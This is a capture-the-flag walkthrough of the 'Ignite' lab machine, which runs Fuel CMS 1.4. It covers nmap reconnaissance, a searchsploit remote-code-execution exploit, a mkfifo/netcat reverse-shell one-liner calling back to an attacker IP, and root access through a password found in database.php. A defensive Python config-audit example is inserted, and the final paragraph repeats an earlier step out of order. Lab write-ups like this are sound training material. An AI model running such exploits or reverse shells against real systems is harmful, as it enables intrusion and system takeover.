Ignite


Last updated 3 years ago


Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn).

nmap -Pn 10.10.108.60

Detailed Nmap scan:

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying port 80

  • (-oN nmap): Saving the output to a file called nmap

nmap -sC -sV -p 80 -oN nmap 10.10.101.147

Enumeration

Let's visit the website.

It's a guide on how to use Fuel CMS. In the nmap scan we saw a hidden directory called /fuel; let's visit that. It redirects us to this page.

It's a login page. At the moment we do not have credentials, so we cannot log in. Let's go to searchsploit and search for exploits for this version of Fuel CMS.

searchsploit fuel cms 1.4

We can see that there are two remote code execution vulnerabilities; let's use one of them to exploit this machine. Let's copy this exploit to our directory.

searchsploit -m linux/webapps/47138.py

Looking through the exploit, we need to change the URL to the URL of the machine we are attacking.

After changing it, I ran the exploit.

python 47138.py
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Make sure to change the IP and start a netcat listener.

nc -lvnp 1234

Before running the command, let's remove all the unnecessary code in the exploit so that we do not get errors from parts that do not concern us.

Now let's run the command and then run the reverse shell command, and we get a shell.

Now we can read the flag.txt file.

Privilege Escalation

After looking around for a while, I went into the /var/www/html/fuel/application/config directory, as config files are always interesting. One file that looked very interesting to me was the database.php file, as I thought that I could find usernames and passwords in it.

cat database.php

And I did find the root password.

Now time to switch users to root.

su root

And we are now root; we can go read the root.txt flag.
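
The escalation above worked because a password stored in database.php also worked for `su root`. As an added example (not part of the original writeup), this Python check flags the conditions that make that possible on a web host; the CodeIgniter-style `'key' => 'value'` layout, the sample file contents and the finding names are assumptions constructed for illustration.

```python
import os
import re
import stat

# Matches CodeIgniter-style array entries such as:  'password' => 'secret',
ENTRY = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")

# Constructed sample input, not the contents of the file on the target machine.
SAMPLE_CONFIG = """<?php
// 'password' => 'old-commented-out',
$db['default'] = array(
    'username' => 'root',
    'password' => 'EXAMPLE-ONLY',
);
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
deploy:x:1000:1000::/home/deploy:/bin/sh
"""

def parse_db_config(text):
    """Return the 'key' => 'value' string pairs, ignoring comment lines."""
    live = [ln for ln in text.splitlines()
            if not ln.lstrip().startswith(("//", "#", "*", "|"))]
    return dict(ENTRY.findall("\n".join(live)))

def audit_db_config(text, mode):
    """Return findings for config text and the file's st_mode bits."""
    cfg, findings = parse_db_config(text), []
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    if cfg.get("password"):
        findings.append("hardcoded-password")
    if cfg.get("username") == "root":
        findings.append("db-user-is-root")
    return findings

def login_accounts(passwd_text):
    """Accounts with an interactive shell; none may share the DB password."""
    rows = (ln.split(":") for ln in passwd_text.splitlines())
    return [r[0] for r in rows
            if len(r) == 7 and not r[6].endswith(("nologin", "false"))]

def audit_file(path, passwd_path="/etc/passwd"):
    """Audit a real config file; returns (findings, accounts to verify)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings = audit_db_config(fh.read(), os.stat(path).st_mode)
    with open(passwd_path, encoding="utf-8") as fh:
        return findings, login_accounts(fh.read())
```

Any account returned by `login_accounts` should have a password distinct from the one in the config file, and the application should connect with a dedicated low-privilege database user.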

We have remote code execution, so now we can run commands on the victim machine. Let's run a reverse shell command to get a shell on the machine. We can find a reverse shell here.